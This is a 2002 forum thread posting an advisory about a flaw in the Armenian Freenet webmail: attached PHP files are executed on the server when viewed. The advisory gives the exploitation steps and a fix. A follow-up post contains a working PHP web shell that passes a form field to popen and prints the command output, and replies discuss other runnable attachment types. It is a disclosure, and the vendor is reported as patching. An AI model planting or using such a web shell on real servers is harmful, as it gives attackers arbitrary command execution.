Armenian Knowledge Base  

Go Back   Armenian Knowledge Base > Technical sections > Software > Software Security
Register

Reply
 
LinkBack Thread Tools
Old 09.07.2002, 06:49   #1
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post Armenian Freenet web based mailer security flaw

Armenian Freenet web based mailer security flaw
(software design bug)

VX Advisory #0002

0Originally Discovered by Vahram Igityan <[email protected]> @ 20020708

0DESCRIPTION
Armenian Freenet is the most popular free mail and hosting server in Armenia.
And it's web based mailer is part ot their free service located at http://email.freenet.am.

0OVERVIEW
Users on Armenian Freenet can execute any type of PHP code.

0DETAILS
When user is viewing his/her attachment its' beeing saved on server's disk in uniquie
directory and beeing getted by browser, so if you attach .php file, it will be parsed
by server.

0EXPLOIT
Write code like <? phpinfo();?> ,attach it and send to freenet account, the open youre
inbox using their web based mailer and -=enjoy=-

0SOLUTION
Rewrite the part of attachemt viewing code, use directory outside the DocumentRoot and show
attch by opening and dumping a file.
---eof--
__________________
Праздник к нам приходит...

|^^^^^^^^^'''^\| ||\__
| ВОДКА-ВОДКА | ||','''|'''''''\_____,_
| _..... _ | ||_ _|'__|_____||.........| |
'(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
Reply With Quote
Old 09.07.2002, 07:42   #2
Студент
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

lol

Mne prosto interesno, est' li takoj tip attachmenta, kotoryj imeet smysl takim obrazom pokazyvat' (dage html ya by tak ne pokazyval)..

Nice discovery!
Reply With Quote
Old 09.07.2002, 15:23   #3
Школьник
 
Join Date: 04 2002
Location: Vanadzor
Posts: 227
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

LoL
Reply With Quote
Old 09.07.2002, 16:47   #4
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

And here is a proof exploit code ))
Code:
<?
function fo(){
?>
<BODY>
<FORM>
<INPUT TYPE=TEXT NAME=cmd VALUE=&quot;ls&quot;>
<INPUT TYPE=SUBMIT NAME=&quot;ss&quot; VALUE=&quot;bb&quot;>
</FORM>
</BODY>
<?
}

if (!isset($ss)){
	fo();
}else
{	
echo &quot;<PRE>\n&quot;;
	$pi = popen(&quot;$cmd&quot;,&quot;r&quot;);
		while ( ! feof($pi))
			print fgets($pi,512);
	pclose($pi);
echo &quot;</PRE>\n&quot;;
}
?>
Reply With Quote
Old 09.07.2002, 17:15   #5
Студент
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Thumbs up

Nothing else to say!
Nice job! And a really funny one! I bet fn-ovskij admin etot forum ne chitaet, tak chto eto delo esche dolgo budet available..
Reply With Quote
Old 09.07.2002, 18:13   #6
Школьник
 
Join Date: 04 2002
Location: Vanadzor
Posts: 227
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

2 VX
misht vor senc luj ben es gtnu, arajin@ sysadmin asa, te che es drutyamb 1000avor userner kan fn-um.
mekn el xixch@ korcni u ....

vobshem ti mokodec!!! bayc anpayman skzbic adminin asa, ete iharke der ches asel
Reply With Quote
Old 09.07.2002, 18:31   #7
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Quote:
Originally posted by strax.:
2 VX
misht vor senc luj ben es gtnu, arajin@ sysadmin asa, te che es drutyamb 1000avor userner kan fn-um.
mekn el xixch@ korcni u ....

vobshem ti mokodec!!! bayc anpayman skzbic adminin asa, ete iharke der ches asel
Vendor was already notofyed...
But no ansewer getted
Reply With Quote
Old 09.07.2002, 20:38   #8
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Admin replyed...
He's very nice person
Reply With Quote
Old 10.07.2002, 11:53   #9
Студент
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Hmm.. Ne znayu kak eto vyrazit' v slovax no eto chto-to..
ANY file, kotoryj on znaet kak zapuskat', mailer zapuskaet v sebe, eto vklyuchaet php, cgi (tut malen'kie problemy s privilege-ami, no eto erunda), asp i tak dalee..
Eto prosto koshmar!

Plus file-y bez rasshireniya po neizvestnym prichinam pereimenovyvaet v file.txt i voobsche rabotaet prosto potryasno

2 VX:
Nadeyus' Tigran eto vse ponyal.. Emu nado voobsche prikryt' web-email poka on ego ne ispravit, esli emu freenet dorog ili ge ego rabota.
__________________
http://www.d-brane.com
Reply With Quote
Old 10.07.2002, 12:25   #10
Студент
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Cool

2 VX
Eto Tigran tipa "zakryl" php, ostaviv vse ostal'noe??
Interesnyj chelovek

By the way naschet asp ya kagetsya nedosmotrel normal'no, ne ponimaet vrode by, no .c file-y ne pokazyvaet, opyat' taki vidno pytaetsya zapustit' u sebya i ne poluchaet privilegij ( similar to cgi )
Reply With Quote
Old 10.07.2002, 17:25   #11
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

DA, on imenno zakryil
Xot' teper' "naglo" vzlomat' ne smogut
Reply With Quote
Old 10.07.2002, 17:57   #12
Школьник
 
Join Date: 05 2002
Location: Yerevan
Posts: 202
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

VX, чего не отвечаешь на пЫсма?
Свяжись со мной как-нить...
Reply With Quote
Old 14.07.2002, 00:11   #13
Moderator
 
Mono's Avatar
 
Join Date: 10 2001
Location: Yerevan
Posts: 5,466
Downloads: 1
Uploads: 0
Blog Entries: 1
Reputation: 110 | 5
Thumbs up

Dzec !!
Reply With Quote
Sponsored Links
Reply

Thread Tools


На правах рекламы:
реклама

All times are GMT. The time now is 23:49.


Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.